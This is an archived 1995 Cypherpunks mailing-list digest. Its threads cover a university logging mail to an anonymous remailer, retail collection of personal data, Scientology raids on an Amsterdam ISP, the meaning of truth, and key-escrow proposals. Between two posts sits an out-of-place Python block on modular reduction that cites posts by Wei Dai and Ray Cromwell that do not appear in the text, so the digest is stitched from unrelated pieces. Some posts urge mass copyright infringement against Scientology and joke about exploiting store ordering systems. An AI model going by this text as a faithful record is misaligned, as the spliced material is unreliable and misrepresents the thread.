> Subject: University logging mail to anon.penet
>
> This just came up locally, and I'd like to have some comments on it,
> especially from people who understand the law a lot better than I do:
>
> Our local University apparently has been logging ALL mail to anon.penet,
> including faculty, students, and off-campus users.
>
> They maintain such weak security that someone was able to "obtain"
> the logs and post them to a local usenet group, thus compromising
> everyone's "anonymous" identities.
>

punk.net is in San Luis Obispo. Since Skypoint carries a lot of regional groups, I can follow the issue on Usenet, in these groups:

slo.unix,slo.general,slo.punks,alt.comp.acad-freedom.talk,comp.org.eff.talk

Those of you who don't get the slo.* groups, you can probably see the original posts in comp.org.eff.talk or alt.comp.acad-freedom. The subject is "No subject".

(I still chuckle when I see the group slo.sex ...)

From rrothenb at ic.sunysb.edu Wed Sep 6 20:04:38 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Wed, 6 Sep 95 20:04:38 PDT
Subject: Collection of personal information etc. etc. etc.
In-Reply-To: <8B094FC.000504D58B.uuout@the-matrix.com>
Message-ID: <199509070305.XAA18310@libws4.ic.sunysb.edu>

> It's not just credit anymore. If you buy something at Radio
> Shack, even with cash, they want you to give all your info
> voluntarily and they _will_ give you flak if you don't
> cooperate (which can be short-circuited by threatening to cause
> a scene or by suggesting loudly that has lower
> prices).

Depends on the counter people. At the local RS here the clerks don't care much about it and will enter a random number. A local Service Merchandise does the same thing, but they're pesky, so I make up silly names to test the wits of impatient teenage mutant cashiers.

(They also used to have a computer where you enter your telno. and place orders to pick up at the desk... I don't think the system bills you automatically but the employees probably won't like it when you have them get 10 weight sets out...)
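The block-wise reduction that Wei Dai sketches in his "fast modular reduction" post above, and that Ray Cromwell's reply picks apart, rendered as a short Python program. This is an added example, not code from Wei Dai's post or from Microsoft's implementation: Python's arbitrary-precision integers stand in for multi-block arithmetic, the radix B is a parameter so that base-10 cases can be checked on paper, and step 4 is repeated while the top block is still set (my choice, which keeps the invariant Y < B^i at the end of each pass easy to argue). The final step from n+1 blocks down to n, which the post says can be done with one single-precision division and n single-precision multiplications, is left to Python's % operator here.

```python
# Added example (not from Wei Dai's post or from Microsoft): a Python
# rendering of the block-wise modular reduction sketched on the list.
# Python's arbitrary-precision ints stand in for multi-block arithmetic,
# and B (the radix) is a parameter so small cases can be checked by hand.


def num_blocks(x, B):
    """Number of base-B blocks needed to represent x (1 for x == 0)."""
    count = 0
    while x:
        x //= B
        count += 1
    return max(count, 1)


def block_reduce(X, m, B=1 << 32):
    """Reduce X to a congruent value at most n+1 blocks long, where n is the
    block length of the modulus m. Returns (Y, n).

    Steps 1-4 follow the posted pseudocode; the one choice made here is to
    repeat step 4 while block i is still set, so that the invariant
    Y < B**i holds when the pass for block i finishes.
    """
    if m <= 0 or X < 0:
        raise ValueError("need m > 0 and X >= 0")
    n = num_blocks(m, B)
    U = pow(B, n + 1, m)            # B^(n+1) mod m: the smaller equivalent of B^(n+1)
    Y = X                            # step 1
    k = num_blocks(Y, B) - 1         # X is k+1 blocks long
    for i in range(k, n, -1):        # step 2: i from k down to n+1
        Bi = B ** i
        top = (Y // Bi) % B          # Y[i], the highest block still set
        # step 3: swap Y[i]*B^i for the congruent but smaller Y[i]*U*B^(i-n-1)
        Y = Y - top * Bi + top * U * B ** (i - n - 1)
        # step 4: the add-back can carry into block i again; clear it the same way
        while Y >= Bi:
            Y = Y - Bi + U * B ** (i - n - 1)
    return Y, n


def mod_via_blocks(X, m, B=1 << 32):
    """Full reduction: the block loop above, then the final n+1 -> n block step.
    The post says that last step takes one single-precision division plus n
    single-precision multiplications; Python's % stands in for it here."""
    Y, _ = block_reduce(X, m, B)
    return Y % m


if __name__ == "__main__":
    # Hand-checkable case: B = 10, m = 97 (n = 2 blocks), U = 10^3 mod 97 = 30.
    # X = 123456 (k = 5) shrinks to 266 after the block loop, and 266 mod 97 = 72.
    print(block_reduce(123456, 97, 10))       # (266, 2)
    print(mod_via_blocks(123456, 97, 10))     # 72
    # A 32-bit-word case: 96-bit modulus (n = 3), 201-bit X (k = 6).
    m = (1 << 95) + 12345
    X = (1 << 200) + 987654321
    Y, n = block_reduce(X, m)
    print(n, Y < (1 << 32) ** (n + 1), Y % m == X % m)   # 3 True True
```

With B = 10 and m = 97 (so n = 2 and U = 30) the loop can be followed on paper: 123456 becomes 26456, then 7056, then 266, each pass removing block i and adding back Y[i]*30*10^(i-3); 266 mod 97 = 72 = 123456 mod 97. When X is only one block longer than m (k = n, the case Ray raises), range(k, n, -1) is empty, so the loop body never runs in this rendering and only the final step remains.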
From rrothenb at ic.sunysb.edu Wed Sep 6 20:05:35 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Wed, 6 Sep 95 20:05:35 PDT
Subject: University logging mail to anon.penet
In-Reply-To: <199509070230.TAA24609@goblin.punk.net>
Message-ID: <199509070306.XAA18362@libws4.ic.sunysb.edu>

So which university is this?

> This just came up locally, and I'd like to have some comments on it,
> especially from people who understand the law a lot better than I do:
>
> Our local University apparently has been logging ALL mail to anon.penet,
> including faculty, students, and off-campus users.
>
> They maintain such weak security that someone was able to "obtain"
> the logs and post them to a local usenet group, thus compromising
> everyone's "anonymous" identities.
>
> --
> Jeff Simmons jsimmons at goblin.punk.net
>

From jsimmons at goblin.punk.net Wed Sep 6 20:29:03 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Wed, 6 Sep 95 20:29:03 PDT
Subject: University logging mail to anon.penet
In-Reply-To: <199509070306.XAA18362@libws4.ic.sunysb.edu>
Message-ID: <199509070326.UAA24732@goblin.punk.net>

>
>
> So which university is this?
>
> > This just came up locally, and I'd like to have some comments on it,
> > especially from people who understand the law a lot better than I do:
> >
> > Our local University apparently has been logging ALL mail to anon.penet,
> > including faculty, students, and off-campus users.
> >
> > They maintain such weak security that someone was able to "obtain"
> > the logs and post them to a local usenet group, thus compromising
> > everyone's "anonymous" identities.
> >

California State Polytechnic University, San Luis Obispo

--
Jeff Simmons jsimmons at goblin.punk.net

From mnorton at cavern.uark.edu Wed Sep 6 20:33:36 1995
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Wed, 6 Sep 95 20:33:36 PDT
Subject: Collection of personal info
In-Reply-To: <199509070227.VAA00478@einstein.ssz.com>
Message-ID:

Doesn't make it true, in Tim's sense--just makes it verifiable.

MacN

On Wed, 6 Sep 1995, Jim Choate wrote:

> Truth is that which can be verified to be reproducible by independent and
> unbiased parties. All else is opinion.

From dneal at usis.com Wed Sep 6 20:35:35 1995
From: dneal at usis.com (David Neal)
Date: Wed, 6 Sep 95 20:35:35 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID:

On Wed, 6 Sep 1995, Timothy C. May wrote:

> At 10:15 PM 9/6/95, Rob Lowry wrote:
>
> >Beyond having the willies.. This is more than just scary, it feels like
> >rape when you think about it for awhile. Everything you buy, on credit, is
> >recorded and sold to someone who wants to know your secrets. Every time
> >you make a banking transaction, someone is watching and compiling the
> >data.
> >
>
> If someone doesn't want their postings going into my 220 megabyte file of
> postings, they shouldn't send them to me. Or they should adopt a digital
> pseudonym, unlinkable to their True Name or any other nyms they may have.
>
> Things are much simpler and less stressful when you don't look to the law
> to fix things.
>

Nor was I suggesting a legal solution (I know your comment was triggered by Rob's request for legal recourse) but instead suggesting that things are farther along than some people realize.

Someone suggested a rational, non-hysterical approach to converting people. Perhaps. I certainly wrote a nice letter to the editor of a magazine which published a piece about electronic checking, and made sure to mention that e-cash would be preferable to some.
On the other hand, The Gub'mint is certainly conducting a campaign overt and covert to throttle unlimited and uncontrolled use of cryptography. That, combined with how politicized things are these days, makes it difficult to conduct a rational debate or in fact find anyone who wants to talk.

Personally, I'm of the opinion that we need a pre-emptive crypto strike. But just as the 'Privacy Card' has been debated here endlessly, so too reaching critical market mass w/a 'bump in the cord' product.

David Neal - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant.
"...you have a personal responsibility to be pro-active in the defense of your own civil liberties." - S. McCandlish

From gjeffers at socketis.net Wed Sep 6 20:44:26 1995
From: gjeffers at socketis.net (Gary Jeffers)
Date: Wed, 6 Sep 95 20:44:26 PDT
Subject: ON OFF-TOPIC
Message-ID: <199509070639.BAA00416@mail.socketis.net>

ON OFF-TOPIC

THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY!

CRYPTO CODERS SUPPLY THE MEANS! CONSPIRACY THEORISTS SUPPLY THE MOTIVATION!

conspiracy theorist = alternative political theorist NOT= AP/ABC/CBS/NBC/CIA/FBI/U.S GOV'N./New York Times/Washington Post opinion moulders syndicate

"extremist right-wing kook" = old fashioned American patriot Left term used often by left-wing extremist liberal statist kooks.

The United States "Federal" Government - we'll be even more American without it.

PUSH EM BACK! PUSH EM BACK! WWWAAAYYYY BBBAAACCCK! BBBEEEAAATTTT STATE!

From rjc at clark.net Wed Sep 6 20:46:27 1995
From: rjc at clark.net (Ray Cromwell)
Date: Wed, 6 Sep 95 20:46:27 PDT
Subject: Scientology and police visit XS4ALL Amsterdam
In-Reply-To:
Message-ID: <199509070346.XAA14571@clark.net>

Anyone ready to risk running a "Scientology .sig virus server"? Here's the idea. The CoS apparently freaks out and sues anyone who distributes CoS material, even those who quote small portions of it.
In the same spirit as the "export-a-sig-PGP" system, why not break the CoS materials up into n pieces (each piece being 5-10 lines long) and let people request chunks from a server to put in this .sig? The assumption is, the Church can't sue everyone (legal funds being limited). I think I'd do it just to piss them off.

To spread the risk around even more, I'd place the "piece server" on k different HTTP sites just so they can't raid them all. Even better would be to use a script on one master server to dynamically return HTTP redirects to k different URLs to the real servers. Another option is dynamic DNS. Finally, you could have the server run thru email via a chained anonymous return block. The result would be sent back thru a remailer chain.

The nastiest thing I can think of is to get the CancelBot people to let a massive broadcast of CoS materials be sent to UseNet.

Other options include servers which detect known CoS source addresses and provide "fake fronts" to them. (easily doable with CGI/CERN server and IDENT).

Cypherpunks oughta be able to figure out something to show those idiots why their actions are ultimately futile.

-Ray

From mark at lochard.com.au Wed Sep 6 20:49:19 1995
From: mark at lochard.com.au (Mark)
Date: Wed, 6 Sep 95 20:49:19 PDT
Subject: Scientology and police visit XS4ALL Amsterdam
In-Reply-To:
Message-ID: <199509062303.AA24688@junkers.lochard.com.au>

>> This is the second or third time I've seen descriptions of such
>> raids where cult (no, I'm not trying to be diplomatic)
>> representatives were present and participating. Is this legal in
>> Amsterdam? How about in the U.S.? Britain?
>>
>Probably. Amsterdam isn't exactly the wild west, and they didn't take the
>computer equipment with them, they just inventoried everything so to have
>something to sell when their claims prove valid. Which I doubt (shit, I
>will be moving to this country in a couple of weeks...)
The good news is xs4all were prepared for them and have mounted a publicity campaign against co$. co$ has withdrawn their complaint (though xs4all have not been _officially_ notified yet) in an attempt to patch up things but it's too late for co$ to save them from the wrath. xs4all has a lot of support in all facets of .nl life so co$ is going to have a bad time screwing with them. From what I learnt there will be a lot of noise RSN in the press.

My personal view is co$ deserves all the flak they get.

Mark
mark at lochard.com.au
The above opinions are rumoured to be mine.

From unicorn at polaris.mindport.net Wed Sep 6 20:52:21 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Wed, 6 Sep 95 20:52:21 PDT
Subject: University logging mail to anon.penet
In-Reply-To: <199509070230.TAA24609@goblin.punk.net>
Message-ID:

On Wed, 6 Sep 1995, Jeff Simmons wrote:

> This just came up locally, and I'd like to have some comments on it,
> especially from people who understand the law a lot better than I do:
>
> Our local University apparently has been logging ALL mail to anon.penet,
> including faculty, students, and off-campus users.
>
> They maintain such weak security that someone was able to "obtain"
> the logs and post them to a local usenet group, thus compromising
> everyone's "anonymous" identities.

Which University please?

>
> --
> Jeff Simmons jsimmons at goblin.punk.net
>

From damion.furi at the-matrix.com Wed Sep 6 20:59:29 1995
From: damion.furi at the-matrix.com (DAMION FURI)
Date: Wed, 6 Sep 95 20:59:29 PDT
Subject: Collection of persona
In-Reply-To: <8B094A8.000504D4D8.uuout@the-matrix.com>
Message-ID: <8B0951B.000504D5AC.uuout@the-matrix.com>

BU|In fact it's not difficult. It's quite simple to establish new identity
  |for the individual willing to risk the charges and consequences of
  |exposure. The basic impediment is time. Good credit doesn't come
  |overnight.
  |The second impediment is tax evasion- which is less than
  |justifiable in the United States on the grounds of privacy. If you're
  |willing to be patient, and pay taxes on more than one name, it's easy to
  |maintain several identities.

A lot of "ifs" there. Not to mention the expense.

BU|> If it were possible to have an alias in real
  |> life, as easy as it is to get one on the 'net that is, then I would most
  |> certainly do so..

BU|Which tells me how serious you really are about your privacy. You have
  |made a decision here about how much trouble privacy is worth to you,
  |which is "not much."

And how many "real names" do you have off the net?

BU|I hear people bitch about privacy endlessly. Privacy helps those who
  |help themselves to privacy. I think Mr. May was precisely correct in saying
  |that it is so much easier and simpler for one to rely on self privacy
  |insurance rather than government privacy insurance.

Certainly. That doesn't mean that we're all going to jump up and maintain several aliases. Particularly when our beloved Uncle Sam is quite capable of deciding that it's for fraudulent purposes -- which makes it a felony. It would be simpler and easier to start another revolutionary war than follow your logic.

:----------:----------:----------:----------:----------:----------:-----
: furi at the-matrix.com | pgp-public-key at demon.co.uk | LIVE LION ALERT
: 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0 F7 E9 67 1F AF B8 2D 94
PGP: When it's none of their damned business.
-- SPEED 1.40 [NR]: Evaluation day 133...

From hayden at krypton.mankato.msus.edu Wed Sep 6 21:02:31 1995
From: hayden at krypton.mankato.msus.edu (Robert A.
Hayden) Date: Wed, 6 Sep 95 21:02:31 PDT Subject: University logging mail to anon.penet In-Reply-To: <199509070230.TAA24609@goblin.punk.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 6 Sep 1995, Jeff Simmons wrote: > This just came up locally, and I'd like to have some comments on it, > especially from people who understand the law a lot better than I do: > > Our local University apparently has been logging ALL mail to anon.penet, > including faculty, students, and off-campus users. > > They maintain such weak security that someone was able to "obtain" > the logs and post them to a local usenet group, thus compromising > everyone's "anonymous" identities. I'd say that there are some serious ethical and legal concerns that should be addressed by the administration for keeping such logs... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.2 iQCVAwUBME5SwjokqlyVGmCFAQGuLQP/TA9F2Vf65o37Yq821zFfBB8HNekfdB6I PcmaRPHFzlgGfV2iSQm4sn0KHLddpX70ZrUaGM2uuJsYC1iwPagGOQR0Y51tjU7Y 1O+jBf3Pjsa64rox1Y5+7fQAnl4hD5Io13MtsosDC19kjPYuoJ33RHWF/uiHRT5N stRLLxwWjEo= =MQuw -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ Finger for Geek Code Info <=> Finger for PGP Public Key \/ / -=-=-=-=-=- -=-=-=-=-=- \/ http://krypton.mankato.msus.edu/~hayden/Welcome.html -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+ K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++** ------END GEEK CODE BLOCK------ From Jaeson.M.Engle at dronf.org Wed Sep 6 21:06:09 1995 From: Jaeson.M.Engle at dronf.org (Jaeson Engle) Date: Wed, 6 Sep 95 21:06:09 PDT Subject: ULC Online Message-ID: Just in case anyone else wants to go ahead and get ordains in the ULC, http://ybi.com/ulc/ordain.html Online form for getting ordained. Jaeson -- Jaeson M. 
Engle http://www.dronf.org Coordinator of the Jourvian Group PGP Mail Encouraged -> jme.pub.key at dronf.org Project List -> programs at dronf.org From robl at on-ramp.ior.com Wed Sep 6 21:11:15 1995 From: robl at on-ramp.ior.com (Rob Lowry) Date: Wed, 6 Sep 95 21:11:15 PDT Subject: Collection of personal info In-Reply-To: Message-ID: > Nor was I suggesting a legal solution (I know your comment > was triggered by Rob's request for legal recourse) but instead > suggesting that things are farther along than some people realize. Nor do I support additional rules/laws or regulations.. but if there are existing ones to screw with, use 'em.. Recently I had a bill turned over to collections from, of all places, the daycare we used to take our kids too.. we owe them about $1300 in their estimation. The reason we have not paid is due to 11 days of lost work due to head lice that they provided to my kids, plus they stopped serving breakfast which was in the contract we signed when enrolling the kids there.. I was notified by the collection co. about this submittal (now $1500 for some reason..) and by law, I can dispute this in writing, thus slowing the wheels of the collection monster horribly. I did so.. and for the last 4 months, they have been trying to prove I owe money.. I was asking if such a system exist for the release of your credit info.. and it appears that there is no safety mechanism in that monster. Rather than cry out for more laws to be twisted against us later, I agree that letting it happen, and using cash instead of credit, is the smart answer here. Someone care to point me at e-cash info? sounds interesting.. 
remember, I am new to the crypto scene and still think PGP is neato ;) From rsnyder at janet.advsys.com Wed Sep 6 21:53:31 1995 From: rsnyder at janet.advsys.com (Bob Snyder) Date: Wed, 6 Sep 95 21:53:31 PDT Subject: University logging mail to anon.penet In-Reply-To: Message-ID: <199509070454.AAA19936@janet.advsys.com> hayden at krypton.mankato.msus.edu said: > I'd say that there are some serious ethical and legal concerns that > should be addressed by the administration for keeping such logs... Ethical I would definately agree with. Legally, I'm not so sure of. The applicable law would appear to be the Electronic Communications Privacy Act of 1986. The law does allow administrators to see messages in the normal course of their job, as long as they don't reveal that information to a 3rd party (except law enforcement in the event of a criminal act) This protection is probably strongest with a company you purchase Internet Service from, probably lesser so with a University, since there is less obviously a customer/seller relationship, and almost non-existant with a business, since there isn't a customer relationship, and the systems are owner by the business. Bob From ravage at einstein.ssz.com Wed Sep 6 22:01:44 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Wed, 6 Sep 95 22:01:44 PDT Subject: Collection of personal info In-Reply-To: Message-ID: <199509070507.AAA01347@einstein.ssz.com> > > Doesn't make it true, in Tim's sense--just makes it verifiable. > > MacN > > On Wed, 6 Sep 1995, Jim Choate wrote: > > Truth is that which can be verified to be reproducable by indipendant and > > unbiased parties. All else is opinion. > What exactly is Tim's sense to you? Perhaps Tim could clarify more clearly what he means by 'truth'. To me it sounds like he is saying that there is some viewpoint that is absolute. I no more believe in absolute viewpoints than I believe in absolute coordinates. If it is the 'truth' what makes it unverifiable? 
If I can look at it and claim it isn't the truth (because I can't verify it) how does one know it is the truth then? What separates this unverifiable truth from opinion (which is equally unverifiable by definition)? What is the litmus test? And how do we know the litmus test is true? (I see a circle coming up)

For example, let's say that I have an accident with another motorist. We each tell our story but they are different (or the same for that matter). Which is true? I would hold neither. The incident as described by either of us is simply our recollection of happenstance, in other words our opinion of what occurred. It is not what occurred. The only truth that could be derived would be that an accident had occurred. Why? Because we would have two bent cars that anyone who cared enough could verify.

The truth is not some mighty sword we can wield to reveal some shrouded mystery. It is the realization that the world is a complicated place and we deal with incomplete facts (ie fog of war). From this meager litany of facts we try to derive some conclusion that allows us to control our environment. Truth is a mundane everyday sort of thing, not some magical force. The truth will not free you nor will it guarantee a better tomorrow.

The whole argument breaks down to the simple question of whether it is possible to know anything absolutely. If it is possible to know something absolutely what else to call it but fact (and therefore true)? If it isn't a fact then it is either a lie (ie the inversion of truth) or else an opinion. I don't see how there can be any other division than these three.

Another way to look at it is to say that if it involves faith it can't be truth. Truth can't be dependent on faith (ie observer).

[Looking over this I realize that we are talking about a form of computability]


From tcmay at got.net Wed Sep 6 22:46:01 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 6 Sep 95 22:46:01 PDT
Subject: What is truth?
Message-ID:

At 5:07 AM 9/7/95, Jim Choate wrote:
>> >> Doesn't make it true, in Tim's sense--just makes it verifiable.
>> >>
>> >> MacN
>> >>
>> >> On Wed, 6 Sep 1995, Jim Choate wrote:
>> > Truth is that which can be verified to be reproducible by independent and
>> > unbiased parties. All else is opinion.
>> >
>What exactly is Tim's sense to you? Perhaps Tim could clarify more clearly
>what he means by 'truth'. To me it sounds like he is saying that there is
>some viewpoint that is absolute. I no more believe in absolute viewpoints
>than I believe in absolute coordinates.

I promise to be mercifully brief. This is a subject that we could all go on and on about. I used the ironic "What is truth?," a la Pilate, to indicate some degree of ambiguity. How Jim concluded that I have some absolutist viewpoint from this simple line is unclear to me.

In any case, I don't believe there are "independent and unbiased parties" who can determine what truth is. Not that there is no measure of truth. I am no solipsist, and I believe we have a much clearer view today of how things work than we had, say, 500 years ago. Courtesy of science and the core idea of falsifiability.

As this view relates to government and law, it is that many things are best left outside the bounds of the law. The law stays out of most inter-family disputes, for example, unless violence or fraud of a major sort occurs.

And the law stays out of confirming or refuting religious claims. If Preacher Bob says that praying to Baal will save one's soul, no law officer will step in and stop this "lie." As I like to put it, of the N different religions, at most _one_ of them is "true," and the other N - 1 are based on lies. So, if we are to "allow" religious freedom we must surely allow lies to be told. Q.E.D.

Our liberal, Western society went through this debate a long time ago, and it was pretty much concluded that people could choose their own paths to hell without interference from others. That people were free to believe any damned fool idea they wanted to believe in.

Somewhere along the line we've adopted the new view that government needs to correct all incorrect thoughts, needs to protect people from "hurtful" ideas and speech, and needs to determine what is true and what is not true.

If you want more information on my views about truth, check out the work on "evolutionary epistemology," especially the writings of William Bartley and Karl Popper.

--Tim May

Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."


From rrothenb at ic.sunysb.edu Wed Sep 6 22:50:15 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Wed, 6 Sep 95 22:50:15 PDT
Subject: ECPA (Was: University logging mail to anon.penet.fi)
In-Reply-To: <199509070454.AAA19936@janet.advsys.com>
Message-ID: <199509070542.BAA23214@libws4.ic.sunysb.edu>

Bob Snyder wrote:
> hayden at krypton.mankato.msus.edu said:
> > I'd say that there are some serious ethical and legal concerns that
> > should be addressed by the administration for keeping such logs...
>
> Ethical I would definitely agree with.
>
> Legally, I'm not so sure of. The applicable law would appear to be the
> Electronic Communications Privacy Act of 1986.
> The law does allow
> administrators to see messages in the normal course of their job, as long as
> they don't reveal that information to a 3rd party (except law enforcement in
> the event of a criminal act)

I'm no lawyer, but I believe that technically the ECPA allows them to view mail when it is part of maintenance, which could be in the "normal course of their job[s]", but I think it means that if they see mail while maintaining (ie, bounced msgs) it's OK to read it, but maintenance doesn't mean outright monitoring of mail.

Then again, what does the ECPA say about monitoring message traffic? That's essentially what they are doing, and likely they will rationalize it as being to save their own skins. It also might be the work of a SysAdmin and the school administration would be entirely clueless about it. Another possibility is that a hacker (the same who got ahold of the file?) put in something to monitor it... (my knowledge of Unix is little, though...)

> This protection is probably strongest with a company you purchase Internet
> Service from, probably lesser so with a University, since there is less
> obviously a customer/seller relationship, and almost non-existent with a
> business, since there isn't a customer relationship, and the systems are owned
> by the business.

I've heard some nasty stories about boards and a couple of I-Net providers who charge for access but reserve the right to throw someone off the system without refund (it's often in the terms of many account applications) for various no-nos.

Rob


From damion.furi at the-matrix.com Wed Sep 6 22:51:21 1995
From: damion.furi at the-matrix.com (DAMION FURI)
Date: Wed, 6 Sep 95 22:51:21 PDT
Subject: Collection of persona
In-Reply-To: <8B09569.000504D5D6.uuout@the-matrix.com>
Message-ID: <8B0A00E.000504D665.uuout@the-matrix.com>

DM| Depends on the counter people. The local RS here the clerks don't care
  | much about it and will enter a random number.

I wish they would do that here. I've just about yanked a manager over the counter over it.

DM| A local Service Merchandise
  | does the same thing, but they're pesky, so I make up silly names to test
  | the wits of impatient teenage mutant cashiers. (They also used to have
  | a computer where you enter your telno. and place orders to pick up at
  | the desk... I don't think the system bills you automatically but the
  | employees probably won't like it when you have them get 10 weight sets
  | out...)

I love it when the system has a flaw I can take a crowbar to.

furi at the-matrix.com | pgp-public-key at demon.co.uk | LIVE LION ALERT
2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0 F7 E9 67 1F AF B8 2D 94
PGP: When it's none of their damned business.


From msprague at owens.ridgecrest.ca.us Wed Sep 6 22:54:30 1995
From: msprague at owens.ridgecrest.ca.us (M. F. Pat Sprague)
Date: Wed, 6 Sep 95 22:54:30 PDT
Subject: Diskreet Disk Help Needed
Message-ID: <199509070555.WAA11056@owens.ridgecrest.ca.us>

One of my Diskreet Disks has refused to open but will change size and password. Any suggestions??


From jirib at cs.monash.edu.au Wed Sep 6 23:03:18 1995
From: jirib at cs.monash.edu.au (Jiri Baum)
Date: Wed, 6 Sep 95 23:03:18 PDT
Subject: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <199509070346.XAA14571@clark.net>
Message-ID: <199509070600.QAA11675@molly.cs.monash.edu.au>

Hello Ray Cromwell and all other cypherpunks,

> Anyone ready to risk running a "Scientology .sig virus server"?
...
> In the same spirit of the "export-a-sig-PGP" system, why not break
> the CoS materials up into n pieces (each piece being 5-10 lines long)
...

I don't really follow the Co$ saga, but when I last looked it seemed as though six lines (one of them the title) are sufficient for them to be unhappy at you. If I remember correctly, those six lines said to go to the zoo to practice telepathy with animals... (No they didn't say *how*.)

So I don't know whether the "export-PGP-sig" system will be any use.

...
> To spread the risk around even more, I'd place the "piece server"
> on k different HTTP sites just so they can't raid them all. Even
> better would be to use a script on one master server to
...

master server = single point of pressure

> Cypherpunks oughta be able to figure out something to show those idiots
> why their actions are ultimately futile.

It always was, but do you have the money and the spirit to fight them?

Jiri
--
If you want an answer, please mail to . On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

>: : >>: OT7-48
>: : >>: 1. Find some plants, trees, etc., and communicate to them
>: : >>: individually until you know they received your communication.
>: : >>: 2. Go to a zoo or a place with many types of life and communicate
>: : >>: with each of them until you know the communication is
>: : >>: received and, if possible, returned.


From alt at iquest.net Wed Sep 6 23:21:56 1995
From: alt at iquest.net (Al Thompson)
Date: Wed, 6 Sep 95 23:21:56 PDT
Subject: Are booby-trapped computers legal?
Message-ID:

At 03:38 PM 9/6/95 -0400, hallam at w3.org wrote:
>People who go round drawing parallels to gun ownership and cryptography
>ownership are simply playing into the governments hands.

Which of our rights would you have us surrender so as to not play into the government's hands?

>Cryptography has net benefits to society.
You would have a hard time proving that cryptography has more, or different "net benefits to society" than gun ownership does.

>Most advocates of gun ownership tend to convince me of
>little more than they are a danger to society. Regardless of their case they are
>the biggest argument for gun control, and therefore poor advocates of their
>cause.

Statists say the same thing about crypto-advocates. Talking about keeping secrets, and discussing which methods are uncrackable by the government is not what a statist wants to hear - and neither is talk about the real reason behind the 2nd Amendment.


From vznuri at netcom.com Wed Sep 6 23:30:51 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Wed, 6 Sep 95 23:30:51 PDT
Subject: Another Son of Clipper discussion paper
In-Reply-To: <199509052053.NAA01226@mycroft.rand.org>
Message-ID: <199509070612.XAA16340@netcom8.netcom.com>

J.G. on "proposed escrow techniques":

>In order to help make most productive use of the limited time
>available at the upcoming meeting and to better focus
>deliberation, the following criteria are being distributed for
>discussion purposes. Since it is important that final criteria
>be clear, straightforward, consistent, and implementable, please
>review these draft criteria and be prepared to discuss
>how they may be refined and made more specific.

could someone explain to me why the passive voice is being used in this proposal? who is proposing these criteria? there is a saying "he who appeases an alligator does so in hopes of being eaten last".

J.G., where did this list of proposal items come from? from you? are you a private researcher? if so, how do you justify this list? I mean, I can imagine someone from the NSA coming up with something this specific and restrictive, but frankly I find it in rather poor taste for private, unaffiliated researchers trying to bargain with the NSA. there is a clear-cut right to encryption in a free society, and anything less is a compromise with totalitarianism IMHO.

IMHO no genuine self-respecting cypherpunk would be involved in any kind of discussions involving government key escrow, unless to go as an agent provocateur. the whole issue lends an "aura of legitimacy" to an issue that has absolutely none.

it's like the Perl shirt-- as I have said many times, as long as people argue about the precise legality of the code, they are *losing* the battle with the NSA and playing into their hand and exactly the kind of paranoia over cryptography use they are trying to cultivate.

--Vlad Nuri


From an116512 at anon.penet.fi Wed Sep 6 23:54:39 1995
From: an116512 at anon.penet.fi (an116512 at anon.penet.fi)
Date: Wed, 6 Sep 95 23:54:39 PDT
Subject: not a flame please read and think about this
Message-ID: <9509070626.AA07408@anon.penet.fi>

why is it that half the people who post here work for the government or big companies that are doing the government's bidding (rand.org (which is part of the nsa!) att.com (makers of the clipper chip) mit (which owns rsa) netscape etc etc)

what makes me wonder isn't so much that they're here but that they post so-called reasonable stuff that supports the government line. like when these people report on what the nsa guy says at the crypto convention as if we're supposed to take it seriously and these people who say clipper is good enough no back doors. and then everyone takes this crap seriously.

obviously the government thinks there are some things we shouldn't think about ourselves. and then someone comes along and says they've thought about it already and we should just go mind our own biz. aren't we supposed to be cypherPUNKS? then why do we need these people to think for us?

honest replies only please. i don't mean to flame but this really bothers me. we should maybe think about a closed list.
----------------------------------------------------------------------------
To find out more about the anon service, send mail to help at anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin at anon.penet.fi.


From ravage at einstein.ssz.com Thu Sep 7 00:31:53 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Thu, 7 Sep 95 00:31:53 PDT
Subject: What is truth?
In-Reply-To:
Message-ID: <199509070729.CAA01800@einstein>

> I promise to be mercifully brief. This is a subject that we could all go on
> and on about. I used the ironic "What is truth?," a la Pilate, to indicate
> some degree of ambiguity. How Jim concluded that I have some absolutist
> viewpoint from this simple line is unclear to me.

Actually from your statement I would conclude that you don't believe truth exists at all. That was the original in-context intent of the quote you used. Ambiguity is like pregnancy, it is there or isn't. Bottom line being whether your position is that there is or isn't an absolute, it falls to the same line of argument...faith. My personal opinion is that we are way too ignorant/stupid to ever answer the question.

> In any case, I don't believe there are "independent and unbiased parties"
> who can determine what truth is. Not that there is no measure of truth. I
